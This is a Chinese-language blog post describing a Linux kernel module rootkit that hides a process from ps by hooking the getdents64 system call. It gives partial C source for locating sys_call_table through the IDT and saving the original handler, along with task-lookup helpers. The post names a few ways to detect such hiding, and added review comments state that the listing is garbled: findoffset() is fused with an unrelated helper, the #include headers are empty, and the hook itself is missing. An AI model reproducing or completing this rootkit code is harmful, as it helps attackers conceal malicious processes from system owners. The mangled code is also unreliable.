很早以前的小程序,比较简单但是觉得有趣。原理很简单:Linux 查看进程的命令 ps 是通过系统调用 sys_getdents 实现的,sys_getdents 用于获取指定目录下的目录条目,ps 实际上就是枚举 /proc/ 下的 pid 目录。这样我们只需要 hook 一下 sys_getdents(下面的代码保存的原函数指针带 struct linux_dirent64 参数,即实际挂钩的是 sys_getdents64),把要隐藏的 pid 对应的目录条目去掉即可。需要注意的是,这种方法只对通过枚举 /proc 目录来查找进程的工具有效:直接访问 /proc/<pid>、用 kill(pid, 0) 遍历 pid,或者把 sys_call_table 的内容与 System.map 比对,仍然可以发现被隐藏的进程和被替换的系统调用。
以下是 LKM 代码,在 Linux 2.6.
14测试并运行成功
/*
 * LKM that hides a process from /proc enumeration by replacing the
 * getdents system call.
 *
 * NOTE(review): this listing is an incomplete and damaged extraction.
 * Every "#include" below lost its header name, and findoffset() is
 * mangled: apparently the text between a "<" inside findoffset() and the
 * next ">" (which belonged to a later string-to-integer helper) was
 * dropped, so the loop header of findoffset() and the body of that helper
 * now run into each other.  The replacement getdents handler, init_module()
 * and cleanup_module() are not in the listing either.  Treat what follows
 * as a sketch of the technique, not as buildable code.
 */
#include
#include
#include
#include
#include
#include
#include
#include

/* Presumably the number of bytes findoffset() scans; its actual use is
 * lost in the mangled function body below. */
#define CALLOFF 100

/* A module parameter names the process to hide.  As far as the visible
 * code shows, matching is by task name (see get_name()), not by pid. */
char *processname;
module_param(processname, charp, 0);

/* Image of the IDTR register: 16-bit limit and a 32-bit base.  The
 * 32-bit base here and the two 16-bit offset halves in the gate below
 * only match 32-bit x86.  Presumably filled by "sidt" to locate the
 * int 0x80 gate and from there sys_call_table -- that code is not in the
 * listing, so this is an assumption to confirm. */
struct {
    unsigned short limit;
    unsigned int base;
} __attribute__ ((packed)) idtr;

/* One 32-bit IDT gate descriptor; the handler offset is split across
 * off1 (low half) and off2 (high half). */
struct {
    unsigned short off1;
    unsigned short sel;
    unsigned char none, flags;
    unsigned short off2;
} __attribute__ ((packed)) * idt;

/* Resolved system call table.  Nothing in this listing assigns it. */
void** sys_call_table;

/* Saved original handler so the hook can call through.  The
 * struct linux_dirent64 prototype shows the target is sys_getdents64,
 * not the sys_getdents named in the write-up. */
asmlinkage long (*orig_getdents)(unsigned int fd, struct linux_dirent64 __user *dirp, unsigned int count);

/* MANGLED BY EXTRACTION (see the header comment).  The loop header of
 * findoffset() and the body of a separate decimal string-to-integer
 * helper have been fused: "str", "ptr", "res" and "mul" belong to that
 * lost helper, which returns -1 on a non-digit and otherwise the
 * accumulated value.  Do not try to compile this function as shown. */
char * findoffset(char *start)
{
    char *p;
    for (p = start; p = str; ptr--) {
        if (*ptr '9')
            return (-1);
        res += (*ptr - '0') * mul;
        mul *= 10;
    }
    return (res);
}

/* Walk the task list starting from the current task and return the
 * task_struct whose pid equals @pid, or NULL if none matches.
 *
 * Review notes: the list is walked with neither tasklist_lock nor
 * rcu_read_lock() held in this function, so it races with task exit.
 * The printk() also writes "pid found" to the kernel log on every hit,
 * which is a detection artifact and serves no purpose here. */
struct task_struct *get_task(pid_t pid)
{
    struct task_struct *p = get_current(), *entry = NULL;
    list_for_each_entry(entry, &(p->tasks), tasks) {
        if (entry->pid == pid) {
            printk("pid found\n");
            return entry;
        }
    }
    return NULL;
}

/* Copy p->comm into @buf, writing a backslash as "\\" and a newline as
 * "\n", stopping at the NUL or after sizeof(p->comm) bytes, then append
 * a '\n'.  Returns the pointer just past that '\n'.
 *
 * Caller contract implied by the loop: @buf must hold at least
 * 2 * sizeof(p->comm) + 1 bytes (every input byte may expand to two,
 * plus the trailing '\n'), and the result is NOT NUL-terminated -- when
 * the NUL in comm is reached it is stored and then overwritten by the
 * '\n' below.  Any strcmp()/strlen() on @buf by the caller must account
 * for that. */
static inline char *get_name(struct task_struct *p, char *buf)
{
    int i;
    char *name;

    name = p->comm;
    i = sizeof(p->comm);
    do {
        unsigned char c = *name;
        name++;
        i--;
        *buf = c;           /* first byte of the (possibly escaped) output */
        if (!c)
            break;          /* NUL stored at *buf; replaced by '\n' after the loop */
        if (c == '\\') {
            buf[1] = c;     /* "\\" */
            buf += 2;
            continue;
        }
        if (c == '\n') {
            buf[0] = '\\';  /* "\n" as two characters */
            buf[1] = 'n';
            buf += 2;
            continue;
        }
        buf++;
    } while (i);            /* bounded by sizeof(p->comm) even without a NUL */
    *buf = '\n';
    return buf + 1;
}
以上是我对于这个问题的解答,希望能够帮到大家。